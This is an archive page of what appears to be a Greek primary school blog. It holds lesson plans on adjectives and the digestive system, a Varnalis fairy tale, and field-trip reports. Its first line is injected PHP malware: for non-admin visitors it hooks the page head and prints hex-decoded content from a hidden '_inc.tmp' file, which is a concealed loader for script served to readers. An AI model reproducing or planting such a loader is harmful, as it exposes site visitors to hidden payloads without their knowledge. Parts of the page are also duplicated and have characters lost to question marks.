if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Φεβρουάριος, 2013 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Φεβρουάριος 2013

Η λειτουργία του επιθέτου στο αφηγηματικό κείμενο

Εκπαιδευτικοι:

Κολενδριανού Αργυρώ  ΠΕ70
Καθαροπούλου Κωνσταντίνα  ΠΕ70
Κρυσταλλόγιαννη Ελένη  ΠΕ20

 

Η λειτουργία του επιθέτου στο αφηγηματικό κείμενο

 

Ταυτότητα σεναρίου

Αφορά τη γνωστική περιοχή του γλωσσικού μαθήματος της Ε? τάξης και συγκεκριμένα μπορεί να ενταχθει στην τέταρτη ενότητα με τίτλο «Τα ζώα που ζουν κοντά μας» σελ. 51,52. χρησιμοποιούμε επίθετα και μετοχές με λειτουργία επιθέτου σελ. 56, άσκηση 2 σελ. 57, ασκήσεις 3-4, σελ. 60 άσκηση 4.

 

Διδακτικοί στόχοι

α) Να κατανοήσουν οι μαθητές/τριες τη λειτουργία του επιθέτου στο αφηγηματικό κείμενο

β) Να εξοικειωθούν με την κλίση των επιθέτων και ειδικότερα με την κλίση των επιθέτων σε ?υς, -ια, -υ

γ) Να οικοδομήσουν ένα αφηγηματικό κείμενο αξιοποιώντας την προηγούμενη γνώση

δ) Να εξοικειωθούν με την ηλεκτρονική ανάγνωση των κειμένων

 

2. Ως προς τη μαθησιακή διαδικασία οι διδακτικοί στόχοι είναι η καλλιέργεια της διερευνητικής και συνεργατικής μάθησης.

 

Εφαρμογή 3 δίωρα

 

1ο δίωρο: Αφού διαβάσουν το παραμύθι, ακολουθει συζήτηση γύρω από το περιεχόμενο του παραμυθιού, εντοπίζοντας τα δομικά στοιχεία της αφήγησης (έχουν αποτελέσει αντικείμενο προηγούμενης διαδικασίας) και ανακοινώνονται στην τάξη.

Στη συνέχεια καλούνται να αναγνωρίσουν τα επίθετα που χαρακτηρίζουν τους ήρωες τους και να αντικαταστήσουν τα αντίθετα τους.

 

Στόχος της εργασίας είναι να ανακαλύψουν και να συνειδητοποιήσουν τα παιδιά ότι με τη χρήση των επιθέτων ο αφηγηματικός λόγος εμπλουτίζεται με αξιολογικές κρίσης και σχόλια της συμπεριφοράς των ηρώων.

Η αντικατάσταση με τα αντίθετα αφενός βοηθά στην ανάδειξη της «άλλης» όψης των χαρακτήρων καθώς και στο ότι τα αντιθετικά δίδυμα είναι εκείνα που βοηθούν τη σκέψη και τη γλώσσα.

 

Σ? αυτή τη δραστηριότητα με τη βοήθεια του δασκάλου διερευνούν τα σημεία του παραμυθιού όπου τα επίθετα χρησιμοποιούνται για να δημιουργήσουν νοητικές εικόνες (ξαπλωμένος στο ντιβάνι?) και τα υπογραμμίζουν

 

2ο δίωρο: Δημιουργούν ένα πίνακα με όλες τις γραμματικές κατηγορίες των επιθέτων και κάτω από κάθε κατηγορία να βάλουν και ένα παράδειγμα από το παραμύθι.

 

Φύλλο εργασίας 2

3ο δίωρο:Καλούνται να επιλέξουν από κοινού έναν τίτλο παραμυθιού και να γράψουν τον δικό τους αφηγηματικό κείμενο ακλουθώντας τη δομή των αφηγηματικών κειμένων

Ως προς τη γλωσσική συγκρότηση πρέπει να προσέξουν την ορθογραφημένη χρήση επιθέτων από την πλευρά του αφηγητή κατάλληλων να δηλωθούν αξιολογικές κρίσεις και να αποδοθούν νοητικές εικόνες.

 Με την παραγωγή γραπτού λόγου τα παιδιά εμπλέκονται ενεργά σε μια διαδικασία τελικής αξιολόγησης της χρήσης νέας γνώσης στην οικοδόμηση ενός παραμυθιού

toparamithipoudeneixetelos.jpg

Το παραμύθι που δεν είχε τέλος – Κώστας Βάρναλης

Ζούσε κάποτε πέρα στην Ανατολή ένας τεμπέλης βασιλιάς. Δεν έκανε καμιά δουλειά. Ολημερίς ξαπλωμένος σε ντιβάνι με πολλά μαλακά μαξιλάρια, έβαζε να του λένε παραμύθια κι αυτός άκουε μαχμουρλίδικα.
Αμολούσε σ? όλο του το βασίλειο πλήθος αυλικούς να μαζεύουνε και να στέλνουνε στο παλάτι όσους ξέρανε παραμύθια, άντρες ή γυναίκες, γέρους ή νέους, ντόπιους ή ξένους. Γιατί δε χόρταινε ν? ακούει. Όταν τέλειωνε το παραμύθι, έπεφτε σε βαθιά πλήξη και δυστυχία. Γι? αυτό ήθελε πάντα το ένα παραμύθι ν? ακολουθάει το άλλο. Ακόμα κι όταν έτρωγε κι έπινε ή έπαιρνε το μπάνιο του στη χαβούζα* του παλατιού, ήθελε ν? ακούει παραμύθια. Μονάχα αργά πολύ, μετά τα μεσάνυχτα, όταν τον έπαιρνε ο ύπνος, τότε σιωπούσανε κι οι παραμυθάδες και, πατώντας στα νύχια τους απάνω στα παχιά κιλίμια, φεύγανε σιγά σιγά να πάνε να ξεκουραστούνε κι αυτοί, οι βασανισμένοι!
Όσο πιο μεγάλο και μπερδεμένο ήταν το παραμύθι, τόσο περισσότερο του άρεσε. Ήταν παραμύθια που βαστούσανε μέρες και βδομάδες ολάκερες. Μα όσο μεγάλα και να ήτανε, ερχότανε επιτέλους η ώρα τους να τελειώσουν. Ε, τότε ο βασιλιάς γινότανε τρομερά δυστυχής. Αρρωστούσε, που έλεγες πως θα πεθάνει.
Είδε κι απόειδε αυτός, η δωδεκάδα του (το συμβούλιό του) κι ο γιατρός του, αποφασίσανε όλοι μαζί να στείλουνε τελάληδες* σ? όλες τις επαρχίες και σε όλα τα χωριά του βασιλείου, να διαλαλήσουνε:
? Όποιος ξέρει ένα παραμύθι που να μην τελειώνει ποτέ, ας παρουσιαστεί να το πει του πολυχρονεμένου βασιλιά, κι αυτός θα του δώσει ένα σακί φλουριά και την κόρη του για γυναίκα.
Όσοι ακούγανε αυτά τα λόγια, αστράφτανε τα μάτια τους από τον πόθο να γίνουνε πολύ πλούσιοι και να παντρευτούν τη βασιλοπούλα. Κι όλοι νομίζανε πως θα τα καταφέρνανε να διηγηθούνε παραμύθι χωρίς τέλος. Το κάτω της γραφής, αν αποτυχαίνανε, δε θα είχανε να χάσουνε τίποτα.
Μα οι τελάληδες προσθέτανε στο τέλος:
? Όποιος όμως δε τα καταφέρει να διηγηθεί το ατέλειωτο παραμύθι, τότε ο βασιλιάς θα του κόψει το κεφάλι!
Όταν ακούγανε αυτήν την ποινή, τους έπιανε τρόμος και φόβος. Τότε νιώθανε πως ο βασιλιάς δε ζητούσε εύκολο πράμα. Και λέγανε συναμεταξύ τους:
? Αδύνατα πράγματα ζητάει.
Ωστόσο παρουσιαστήκανε στο βασιλιά δυο τρεις αποφασισμένοι ή να κερδίσουνε το στοίχημα ή να χάσουνε το κεφάλι τους. Ο πρώτος, που δοκίμασε να πει το ατέλειωτο παραμύθι, μπόρεσε να το βαστάξει τρεις μήνες. Μα ύστερα η φαντασία του είχε στερέψει. Μασούσε τα λόγια του, δεν έβρισκε τίποτα να πει και έτσι έχασε το κεφάλι του.
Τότε οι άλλοι δυο φοβηθήκανε κι ούτε καν τολμήσανε ν? αρχίσουνε. Φύγανε, κι ευχαριστούσανε μάλιστα το Θεό που γλυτώσανε απ? του Χάρου τα δόντια.
Πέρασε πολύς, πάρα πολύς καιρός, και κανένας δεν ερχόταν στο παλάτι γι? αυτή τη δουλειά.
Όπου νά σου μια μέρα και παρουσιάζεται ένας ξένος ?από πού ήταν, κανένας δεν ήξερε. Μα η εξυπνάδα του και το θάρρος του ήταν μεγάλα.
? Μεγάλε βασιλιά, είπε, αφού έκανε τον απαραίτητο τεμενά.* Άκουσα πως δίνεις μεγάλη αμοιβή σε κείνον που θα σου διηγηθεί ένα παραμύθι χωρις τέλος. Του δίνεις ένα σακί φλουριά και τη βασιλοπούλα. Είναι αλήθεια;
? Αλήθεια, απάντησε ο βασιλιάς. Αν όμως δεν πετύχει, τότε του παίρνω το κεφάλι.
? Το ξέρω κι αυτό, είπε ο ξένος. Κι είμαι αποφασισμένος να σου διηγηθώ εγώ μια ιστορία που δεν τελειώνει.
? Περιμένω ν? αρχίσεις, είπε ο βασιλιάς και ξαπλώθηκε στον καναπέ απάνω στα πολλά μαξιλάρια.
Τότε ο ξένος στρογγυλοκάθισε στο πάτωμα απάνω στο κιλίμι μπροστά στο βασιλιά κι άρχισε:
«Μια φορά κι έναν καιρό ήταν ένας μεγάλος βασιλιάς, που μάζεψε όλο το σιτάρι της απέναντι χώρας του και το κλείδωσε σε μιαν αποθήκη τόσο μεγάλη, που για να πας από την μιαν άκρη της έως την άλλη θα έπρεπε να περπατάς από το πρωί ίσαμε το βράδυ.
»Μια μέρα έπεσε στην πρωτεύουσα ένα μαύρο σύννεφο ακρίδες τόσο μεγάλο, που σκοτείνιασε ο ήλιος κι όλοι νομίσανε πως ήρθε η συντέλεια του κόσμου. Γιατί γεμίσανε οι δρόμοι, τα σπίτια, ο αέρας, από ακρίδες τόσο πυκνές, που δεν μπορούσες ν ?ανασάνεις.
»Αυτές οι αμέτρητες ακρίδες, αφού φάγανε όλα τα αμπέλια και τα δάση και δε χορτάσανε, μυριστήκανε τελευταία και την αποθήκη του σιταριού. Μα η αποθήκη ήταν πολύ καλά κλεισμένη από παντού, κι όχι μονάχα δεν είχε παράθυρα ή καμινάδες, μα ούτε και καμιά σκισμάδα για να μπορέσουνε να τρυπώσουνε μέσα και να φάνε το σιτάρι.

»Κάμποσες μέρες φέρνανε βόλτα γύρω στην αποθήκη και κοιτάζανε με προσοχή όλες τις μεριές, μπας και βρεθεί πουθενά καμιά τρυπίτσα ή καμιά χαραμάδα. Μα επιτέλους μια τυχερή ακρίδα ανακάλυψε στην ανατολική πλευρά της αποθήκης μια μικρούλα σκισμάδα, που μόλις χωρούσε μοναχή της. Μπήκε το λοιπόν μέσα, πήρε ένα σπειρί σιτάρι και βγήκε.
»Άμα βγήκε αυτή, μπήκε μια δεύτερη ακρίδα, πήρε κι αυτή ένα δεύτερο σπειρί σιτάρι και βγήκε. Άμα βγήκε κι αυτή, μπήκε μια τρίτη ακρίδα, πήρε κι αυτή ένα τρίτο σπειρί σιτάρι και βγήκε. Ύστερα μπήκε μια τέταρτη ακρίδα και πήρε ένα τέταρτο σπειρί σιτάρι, κι άμα βγήκε κι αυτή, μπήκε μια πέμπτη ακρίδα κτλ?»
Περάσανε μέρες, βδομάδες, μήνες, χρόνια, κι ο ξένος αξακολουθούσε να λέει από το πρωί ώς το βράδυ το ίδιο πράμα:
«Ύστερα μπήκε μια άλλη ακρίδα και πήρε άλλο σπειρί σιτάρι. Άμα βγήκε αυτή, μπήκε άλλη ακρίδα και πήρε ένα άλλο σπειρί σιτάρι?»
Περάσανε έτσι δυο χρόνια κι ο ξένος έλεγε και ξανάλεγε από το πρωί ώς το βράδυ το ίδιο χαβά.* Ο βασιλιάς στενοχωριότανε πολύ, ώσπου μια μέρα τονε ρώτησε θυμωμένος:
? Δε μου λες, πόσον καιρό αυτές οι ακρίδες θα μπαίνουνε και θα βγαίνουνε;
? Μα, βασιλιά μου πολυχρονεμένε, ώς τώρα οι ακρίδες αδειάσανε μια πιθαμή σιτάρι από την αποθήκη. Και μένουνε ακόμα τριακόσιες πιθαμές και μιλιούνια ακρίδες. Ίσως μετά εξακόσια χρόνια θα κατορθώσουν να μπούνε στην αποθήκη όλες οι ακρίδες μια μια και ν? αδειάσουνε το σιτάρι. Και πάλι βλέπουμε?

Τότε πια ο βασιλιάς δε βάσταξε. Γούρλωσε τα μάτια του, τινάχτηκε από το ντιβάνι και ξεφώνισε με όλη του τη δύναμη:

? Καταραμένε άνθρωπε. Θα με τρελάνεις! Άι στο καλό! Έχασα το στοίχημα! Πάρε το σακί τις λίρες και την κόρη μου κι άφησέ με ήσυχο.
Έτσι ο έξυπνος αυτός ξενοτοπίτης πήρε τα χρήματα, πήρε τη βασιλοπούλα κι έγινε και διάδοχος του θρόνου.

Ο βασιλιάς είχε γεράσει πολύ κι ευχαριστιότανε τώρα ν? ακούει παραμύθια κι ιστορίες που είχανε τέλος. Κάθε τόσο συνήθιζε να λέει:
? Είμαι ευχαριστημένος, που έμαθα πως μονάχα οι ιστορίες που τελειώνουν είναι όμορφες κι έχουνε ενδιαφέρον.
Άμα πέθανε, έγινε βασιλιάς ο έξυπνος γαμπρός του. Και το κράτος ευτύχησε. Μα οι ιστορικοί δε συμφωνήσανε ακόμα από ποιον τόπο ήταν αυτός ο ξένος.

χαβούζα: δεξαμενή.

* τελάλης: κήρυκας.
* ο τεμενάς: η υπόκλιση.
* χαβάς: τραγούδι, τα ίδια λόγια.

(από το βιβλίο: Aνθολόγιο για τα παιδιά του Δημοτικού, μέρος δεύτερο, Oργανισμός Eκδόσεως Διδακτικών Bιβλίων, 1975)

 

domika stoixeia.jpg

 

 

 

 

Λέξεις Κλειδιά σε αναζητήσεις:

ΕΠΙΣΚΕΨΗ ΣΤΟΝ ΥΔΡΟΒΙΟΤΟΠΟ ΤΗΣ ΛΙΜΝΗΣ ΜΟΥΣΤΟΥ

Στις 23 Ιανουαρίου, τα τμήματα της Πέμπτης και της Έκτης τάξης του Σχολείου μας, επισκέφτηκαν τον υδροβιότοπο της λίμνης Μουστού. Εκεί, οι μαθητές είχαν την ευκαιρία να πληροφορηθούν για την πλούσια χλωρίδα και πανίδα της περιοχής, από τους υπεύθυνους του Φορέα Διαχείρισης Όρους Πάρνωνα και Υγροτόπου Μουστού . Παρατήρησαν με τα κυάλια την περιοχή της λίμνης, είδαν φωτογραφικό υλικό, πήραν απαντήσεις στα ερωτήματά τους και απέκτησαν πολύτιμες γνώσεις γύρω απ΄όσα συζητούν πολλές φορές σε διδακτικές ενότητες, περνώντας από τη θεωρία στη πράξη, που προσφερόταν μπροστά τους.

Στη συνέχεια, οι μαθητές μεταφέρθηκαν στη περιοχή Χερονήσι όπου πραγματοποιήθηκε  ειδική εκδήλωση που οργάνωσε ο Φορέας Διαχείρισης. Η ομαλή και ασφαλής επανένταξη στο φυσικό τους περιβάλλον, ενός μικρού τσακαλιού – που είχε εντοπιστεί τραυματισμένο στην περιοχή προστασίας του υγροτόπου Μουστού πριν 2 μήνες – και τριών γερακίνων. Μετά τη θεραπεία που δέχθηκαν στο κέντρο περίθαλψης του συλλόγου προστασίας και περίθαλψης άγριας ζωής ΑΝΙΜΑ ήταν πλέον έτοιμα να επιστρέψουν στη φύση. Μετά από πολύμηνη περίθαλψη , ήταν πραγματικά συγκινητικό να τα βλέπουμε γερά και ελεύθερα στο φυσικό τους περιβάλλον.

Ήταν πραγματικά μια όμορφη εμπειρία για Μαθητές και  Εκπ/κούς !

ΜΑΘΗΜΑΤΑ ΔΑΣΟΠΥΡΟΣΒΕΣΗΣ

 
Οι μαθητές της Ε΄τάξης κάλεσαν τον Δασικό υπάλληλο κ. Μάνο Ιωάννη να τους ενημερώσει για το θέμα της δασοπυρόσβεσης.
Με πολλή όρεξη και σαφήνεια ενημέρωσε τους μαθητές για τον πλούτο του Πάρνωνα , τα σπάνια είδη φυτών, τα ζώα του τόπου, τους νόμους που αφορούν την προστασία τους , την πρόληψη των πυρκαγιών και το ρόλο της Δασικής Υπηρεσίας.
Οι μαθητές παρακολούθησαν με μεγάλο ενδιαφέρον και έθεσαν τα ερωτήματά τους.
Ευχαριστούμε τον κ. Μάνο για το χρόνο που διέθεσε και τον τρόπο με τον οποίο μετέδωσε πλήθος γνώσεων στους μαθητές, κάνοντάς τους να αγαπήσουν ακόμα περισσότερο τον τόπο τους και να αναπτύξουν το οικολογικό τους ενδιαφέρον.
 

ΜΑΘΗΜΑΤΑ ΔΑΣΟΠΥΡΟΣΒΕΣΗΣ

 

Οι μαθητές της Ε΄τάξης κάλεσαν τον Δασικό υπάλληλο κ. Μάνο Ιωάννη να τους ενημερώσει για το θέμα της δασοπυρόσβεσης.

Με πολλή όρεξη και σαφήνεια ενημέρωσε τους μαθητές για τον πλούτο του Πάρνωνα , τα σπάνια είδη φυτών, τα ζώα του τόπου, τους νόμους που αφορούν την προστασία τους , την πρόληψη των πυρκαγιών και το ρόλο της Δασικής Υπηρεσίας.

Οι μαθητές παρακολούθησαν με μεγάλο ενδιαφέρον και έθεσαν τα ερωτήματά τους.

Ευχαριστούμε τον κ. Μάνο για το χρόνο που διέθεσε και τον τρόπο με τον οποίο μετέδωσε πλήθος γνώσεων στους μαθητές, κάνοντάς τους να αγαπήσουν ακόμα περισσότερο τον τόπο τους και να αναπτύξουν το οικολογικό τους ενδιαφέρον.

 

“Το ταξίδι της τροφής” ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ

ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ


 1.  ΠΑΡΟΥΣΙΑΣΗ ΣΕΝΑΡΙΟΥ
1.1. ΤΙΤΛΟΣ ΣΕΝΑΡΙΟΥ:  “Το ταξίδι της τροφής”
1.2. ΤΑΥΤΟΤΗΤΑ ΣΕΝΑΡΙΟΥ:
 Κολενδριανού Αργυρώ
Καθαροπούλου Κωνσταντίνα
Κρυσταλλόγιαννη Ελένη

 
1.3. ΓΝΩΣΤΙΚΕΣ ΠΕΡΙΟΧΕΣ: Το σενάριο αφορά το γνωστικό αντικείμενο των Φυσικών
(Ερευνώ & Ανακαλύπτω) της Ε΄ τάξης, ενότητα “ΠΕΠΤΙΚΟ ΣΥΣΤΗΜΑ”, μάθημα “Το ταξίδι
της τροφής συνεχίζεται”
 
1.4. ΣΥΜΒΑΤΟΤΗΤΑ ΜΕ ΤΟ Α.Π.Σ. ΚΑΙ ΤΟ Δ.Ε.Π.Π.Σ.:
Το σενάριο είναι απόλυτα συμβατό με το αναλυτικό πρόγραμμα σπουδών  υποχρεωτικής εκπαίδευσης (Α.Π.Σ.) και με το διαθεματικό ενιαίο πλαίσιο  προγραμμάτων σπουδών (Δ.Ε.Π.Π.Σ.) . Οι στόχοι που τίθενται άπτονται πλήρως του  Αναλυτικού Προγράμματος Φυσικών.
 
1.5. ΟΡΓΑΝΩΣΗ ΤΗΣ ΔΙΔΑΣΚΑΛΙΑΣ & ΑΠΑΙΤΟΥΜΕΝΗ ΥΛΙΚΟΤΕΧΝΙΚΗ ΥΠΟΔΟΜΗ:
ΟΡΓΑΝΩΣΗ ΔΙΔΑΣΚΑΛΙΑΣ:
Το σενάριο απευθύνεται στα δύο τμήματα της Ε΄ τάξης σε σύνολο 26 μαθητών. Θα   εργαστούν σε ομάδες των 3-4 ατόμων.
 
         ΥΛΙΚΟΤΕΧΝΙΚΗ ΥΠΟΔΟΜΗ:
Κατά την πραγματοποίηση του σεναρίου θα χρειαστούν Η/Υ και οι μαθητές θα εργαστού στην αίθουσα των υπολογιστών. Επίσης θα χρησιμοποιηθούν: διαδραστικός πίνακας, εκτυπωτής, φύλλα εργασίας και ένα μοντέλο ανθρωπίνου σώματος σε πραγματικές   διαστάσεις.
 
         ΠΡΟΑΠΑΙΤΟΥΜΕΝΕΣ ΓΝΩΣΕΙΣ:
Οι μαθητές ήδη γνωρίζουν την έννοια της ενέργειας, καθώς και το ρόλο της τροφής.
Έχουν μάθει να εργάζονται ομαδοσυνεργατικά. Τέλος, γνωρίζουν τις βασικές δεξιότητες  χρήσης του Η/Υ και είναι σε θέση ν’ ανταποκριθούν σε δραστηριότητες που θα τους ανατεθούν.
 
1.6. ΔΙΔΑΚΤΙΚΟΙ ΣΤΟΧΟΙ:
        Α. ΩΣ ΠΡΟΣ ΤΟ ΓΝΩΣΤΙΚΟ ΑΝΤΙΚΕΙΜΕΝΟ
Οι μαθητές να αναφέρουν τα όργανα του πεπτικού συστήματος και να εξηγούν τη  λειτουργία καθενός από αυτά.
Να εντοπίσουν σε τομή του ανθρωπίνου σώματος τη θέση των οργάνων αυτών.
Να διαπιστώσουν πειραματικά τη χρησιμότητα του σάλιου.
Να διαπιστώσουν πειραματικά τη χρησιμότητα της χολής.
         Β. ΩΣ ΠΡΟΣ ΤΗ ΧΡΗΣΗ ΤΩΝ ΝΕΩΝ ΤΕΧΝΟΛΟΓΙΩΝ
Να αναπτύξουν θετική στάση απέναντι στους Η/Υ.
Να αναζητούν, να αξιολογούν, να επιλέγουν και να αποθηκεύουν πληροφορίες από το   διαδίκτυο.
 
Γ. ΩΣ ΠΡΟΣ ΤΗ ΜΑΘΗΣΙΑΚΗ ΔΙΔΑΣΚΑΛΙΑ
Να παρατηρούν, να μελετούν, να συμπεραίνουν.
Να καλλιεργήσουν την αναλυτική και συνθετική ικανότητα.
Να αναπτύξουν την κριτική τους ικανότητα, τη δημιουργική τους σκέψη, τη φαντασία τους.
Να βιώσουν τη χαρά της έρευνας και της δημιουργίας.
Να τονώσουν την αυτοπεποίθησή τους, συμμετέχοντας σε ομαδικές δραστηριότητες.
 
1.7. ΕΚΤΙΜΩΜΕΝΗ ΔΙΑΡΚΕΙΑ:
Υπολογίζεται ότι απαιτούνται επτά (7) διδακτικές ώρες.
 
2. ΔΙΔΑΚΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ
 
ΘΕΩΡΗΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ: Ακολουθείται ένα μοντέλο ομαδοσυνεργατικής –  ανακαλυπτικής μεθόδου. Δίνεται έμφαση στην κριτική σκέψη, στη συνεργατική μάθηση, στη δημιουργική έκφραση. Οι μαθητές εργάζονται σε ομάδες, αξιοποιώντας τη χρήση των Τ.Ε.Π.
Οι έννοιες και οι πληροφορίες οπτικοποιούνται και εξελίσσονται. Ο μαθητής μπορεί να  αυτενεργήσει, να αναλάβει πρωτοβουλίες, να επέμβει ενεργά.
 
ΜΕΘΟΛΟΓΙΚΗ ΠΡΟΣΕΓΓΙΣΗ: Οι ομαδοσυνεργατικές διαδικασίες συντονίζονται και   καθοδηγούνται από τον εκπαιδευτικό. Ο ρόλος του είναι υποστηρικτικός και ενθαρρυντικός.
Δίνονται στους μαθητές κίνητρα ώστε να εκφράσουν τις απόψεις τους, να αξιολογήσουν τις απόψεις των συμμαθητών τους και μέσα από την ανταλλαγή τους να οικοδομήσουν τη νέα  γνώση. Ο εκπαιδευτικός δίνει σαφείς οδηγίες, έχει ετοιμάσει τα φύλλα εργασίας τωνομάδων, έχει μελετήσει τις ιστοσελίδες που θα διερευνηθούν, έχει προβλέψει τυχόν   απρόοπτα κατά την εκτέλεση του διδακτικού σεναρίου.
 
2.1. ΔΙΔΑΚΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ ΜΕ Τ.Π.Ε.
             Η χρήση των Τ.Π.Ε. οδηγεί σε σύγχρονες προσεγγίσεις μάθησης, εξελίσσοντας το παραδοσιακό διδακτικό μοντέλο. Το Διαδίκτυο αξιοποιείται, ώστε να προωθήσει τις ήδη υπάρχουσες εμπειρίες, να οδηγήσει σε επεξεργασία πληροφοριών και γνώσεων και στην   ένταξή τους στα πλαίσιο που θέτουν το σενάριο και οι μαθητές.
Το Λογισμικό παρουσίασης επιτρέπει την παρουσίαση κειμένων, εικόνων, βίντεο και ήχων.
Αποτελεί εργαλείο απλό ως προς την εκμάθηση και το χειρισμό, που επιτρέπει την ενίσχυση της γνώσης.
Ο Επεξεργαστής κειμένου, ως εργαλείο επεξεργασίας και διαχείρισης πληροφοριών,   διευκολύνει την παραγωγή γραπτού λόγου ομαδοσυνεργατικά. Οι μαθητές καταλήγουν σε   δικά τους κείμενα, καλλιεργώντας τη γλωσσική τους έκφραση.
 
 
2.2. ΤΟ ΠΡΟΤΕΙΝΟΜΕΝΟ ΣΕΝΑΡΙΟ – ΠΟΡΕΙΑ ΔΙΑΔΑΣΚΑΛΙΑΣ ΚΑΙ ΥΛΟΠΟΙΗΣΗ ΔΡΑΣΤΗΡΙΟΤΗΤΩΝ
 
              1η + 2η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Η αφόρμηση γίνεται με την παρουσίαση ψηφιακού δίσκου –   CDRom, που δείχνει την πορεία της τροφής. Κατά τη διάρκεια της προβολής γίνονται    σχολιασμοί και αποσαφηνίσεις. Στη συνέχεια, με τη βοήθεια του μοντέλου του ανθρωπίνου σώματος, φέρνουμε τα παιδιά σε επαφή με τα όργανα του πεπτικού συστήματος. Με κατάλληλες ερωτήσεις προκαλούμε συζήτηση για τη χρησιμότητα των οργάνων.
Πραγματοποιούμε τα πειράματα στο Τ.Ε. του μαθητή, που αφορούν το σάλιο και την  τροφή.
Ζητείται από τους μαθητές να καταγράψουν τη χρησιμότητα των οργάνων και το ρόλο τους στο πεπτικό σύστημα στο 1° φύλλο εργασίας.
 
             3η + 4η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Στο εργαστήριο πληροφορικής τα παιδιά αναζητούν στο
διαδίκτυο πληροφορίες και εικόνες που αφορούν το πεπτικό σύστημα. Επιλέγουν αυτές
που χρειάζονται, τις επεξεργάζονται και γράφουν ένα μικρό κείμενο, για το 2° φύλλο
εργασίας: ” Συλλέγοντας πληροφορίες για το πεπτικό σύστημα”.
 
            5η + 6η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Αφού έχουν συλλέξει πληροφορίες και εικόνες, τις παρουσιάζουν με το κατάλληλο λογισμικό παρουσιάσεων στους συμμαθητές τους. Αυτό είναι το 3° φύλλο  εργασίας:  “Δημιουργώ μια παρουσίαση για το πεπτικό σύστημα”.
 
7η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Δίνεται το 4° φύλλο εργασίας με θέμα: ” Τι έμαθα για το πεπτικό
σύστημα”.
 
2.3. ΕΠΕΚΤΑΣΗ ΔΡΑΣΤΗΡΙΟΤΗΤΑΣ – ΑΞΙΟΛΟΓΙΣΗ
 
             ΕΠΕΚΤΑΣΗ: Οι μαθητές θα μπορούσαν να επεκταθούν με άλλες δραστηριότητες:
– Δημιουργία ακροστοιχίδας για το πεπτικό σύστημα.
– Δημιουργία κολλάζ σε χαρτόνι εικόνων του ανθρωπίνου σώματος.
– Δημιουργία μοντέλου του πεπτικού συστήματος με πλαστελίνη την ώρα των Εικαστικών.
 
ΑΞΙΟΛΟΓΙΣΗ: Η αξιολόγηση γίνεται καθ’ όλη τη διάρκεια του σεναρίου. Πραγματοποιείται σε συνάρτηση με την ανάπτυξη πρωτοβουλιών και την εκτέλεσή του, τη συνεργασία στα   πλαίσια των ομάδων, την επιτυχία των στόχων που έχουν τεθεί, την αξιοποίηση των Τ.Π.Ε.,  την εποικοδομητική χρήση διαλόγου και επιχειρημάτων, την έκφραση των συναισθημάτων του μαθητή ( χαρά, ικανοποίηση, αδιαφορία, δυσκολία κ.λ.π.)
 
ΦΥΛΛΑ ΕΡΓΑΣΙΑΣ
       
            1° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:
             “Η χρησιμότητα των οργάνων του πεπτικού συστήματος”. Οι μαθητές γράφουν στο Φ.Ε. ή στον κειμενογράφο του υπολογιστή, για τη χρησιμότητα του κάθε οργάνου του Πεπτικού Συστήματος. Κάθε ομάδα ασχολείται με ένα θέμα από τα παρακάτω:
 
“Η χρησιμότητα της στοματικής κοιλότητας και του σάλιου”
“Η χρησιμότητα του οισοφάγου”
“Η χρησιμότητα του στομάχου, των γαστρικών υγρών και του παγκρέατος”
“Η χρησιμότητα του λεπτού εντέρου”
“Η χρησιμότητα του παχέως εντέρου, του συκωτιού και της χολής¨.
 
2° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:
“Συλλέγοντας πληροφορίες για το Πεπτικό Σύστημα”.
Η κάθε ομάδα συλλέγει πληροφορίες και εικόνες που θα βρουν στις ιστοσελίδες που θα τους δοθούν (η κάθε ομάδα για το αντικείμενό της). Με βάση τις πληροφορίες αυτές, η κάθε  ομάδα γράφει ένα μικρό κείμενο για το όργανο του πεπτικού συστήματος που έχει αναλάβει.
 
           3° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:
          “Παρουσιάζοντας τα όργανα του Πεπτικού Συστήματος”.
 
4° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ
“Τι έμαθα για το Πεπτικό Σύστημα”
 
1. Τι ονομάζουμε Πεπτικό Σύστημα; Τι λειτουργία επιτελεί;
2.  Ποια είναι τα όργανα του Πεπτικού Συστήματος;
3. α) Ποια ουσία εκκρίνεται από τους σιελογόνους αδένες;
Ποια η χρησιμότητά της;
β)  Ποια ουσία εκκρίνεται από το συκώτι;
Ποια η χρησιμότητά της;
                         Καλή μας Όρεξη!!!

“Το ταξίδι της τροφής” ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ

ΣΕΝΑΡΙΟ ΔΙΔΑΣΚΑΛΙΑΣ


 1.  ΠΑΡΟΥΣΙΑΣΗ ΣΕΝΑΡΙΟΥ

1.1. ΤΙΤΛΟΣ ΣΕΝΑΡΙΟΥ:  “Το ταξίδι της τροφής”

1.2. ΤΑΥΤΟΤΗΤΑ ΣΕΝΑΡΙΟΥ:

 Κολενδριανού Αργυρώ
Καθαροπούλου Κωνσταντίνα
Κρυσταλλόγιαννη Ελένη

 

1.3. ΓΝΩΣΤΙΚΕΣ ΠΕΡΙΟΧΕΣ: Το σενάριο αφορά το γνωστικό αντικείμενο των Φυσικών
(Ερευνώ & Ανακαλύπτω) της Ε΄ τάξης, ενότητα “ΠΕΠΤΙΚΟ ΣΥΣΤΗΜΑ”, μάθημα “Το ταξίδι
της τροφής συνεχίζεται”

 

1.4. ΣΥΜΒΑΤΟΤΗΤΑ ΜΕ ΤΟ Α.Π.Σ. ΚΑΙ ΤΟ Δ.Ε.Π.Π.Σ.:

